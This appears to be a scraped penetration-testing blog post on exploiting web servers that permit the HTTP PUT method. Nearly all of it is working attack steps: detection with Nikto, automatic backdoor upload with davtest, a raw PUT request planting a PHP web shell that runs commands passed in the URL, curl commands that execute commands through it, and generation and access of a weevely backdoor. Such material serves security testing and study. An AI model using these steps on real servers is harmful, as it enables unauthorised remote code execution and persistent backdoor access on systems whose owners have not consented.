read file error: read notes: is a directory 2017-2-18 07:27:57 Author: techvomit.net(查看原文) 阅读量:0 收藏
Detection of vulnerability
Run Nikto:
nikto --host <target ip>:<target port>
If it returns this:
+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.
You are potentially in business.
Use davtest to get a backdoor
This tool runs all of the payloads that it has, sends backdoors if exploitation is successful, and cleans up after itself.
davtest -url "http://${TARGET_IP}:${TARGET_PORT}" -sendbd auto -cleanup
PHP Backdoor with Burp
Capture a request and send it to repeater. Change the method to PUT and add some php code to the bottom of the request. It should look roughly like this:
PUT /test.php HTTP/1.1
Host: <target ip>:<target port>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Fri, 17 Feb 2017 22:27:30 GMT
If-None-Match: "18518f6-5a9-548c16b5e72ae"
Cache-Control: max-age=0
Content-Length: 50
<?php
echo exec($_GET[cmd]);
?>
If the backdoor is successfully landed, you can run commands on the underlying system:
$CMD=whoami
curl "http://${TARGET_IP}:${TARGET_PORT}/test.php?cmd=${CMD}"
Create a backdoor with weevely and upload it with poster
Start by downloading the poster addon for firefox.
Next, spawn a backdoor with weevely:
BACKDOOR_PW='evil'
BACKDOOR_PATH='/root/back.php'
weevely generate "${BACKDOOR_PW}" "${BACKDOOR_PATH}"
Go ahead and upload this shell using the PUT method with Poster by setting the following fields:
URL: http://<target ip>:<target port>/back.php
File: /root/back.php
and then clicking the PUT button.
Now access the backdoor like so:
weevely "http://${TARGET_IP}:${TARGET_PORT}/back.php" evil
Cleanup
Once you’re done, delete the backdoor using the DELETE method with Poster (specify DELETE in the dropdown and click the green button).
Resources:
- https://www.youtube.com/watch?v=vjatR1BKHO8
- https://www.youtube.com/watch?v=Pb6Nd7Cl5XM&t=82s
- https://www.youtube.com/watch?v=mgXWZVJ47qU
- https://www.sans.org/reading-room/whitepapers/testing/penetration-testing-web-application-dangerous-http-methods-33945
- http://www.smeegesec.com/2014/10/detecting-and-exploiting-http-put-method.html
- http://niiconsulting.com/checkmate/2014/04/owning-enterprise-http-put/
如有侵权请联系:admin#unsafe.sh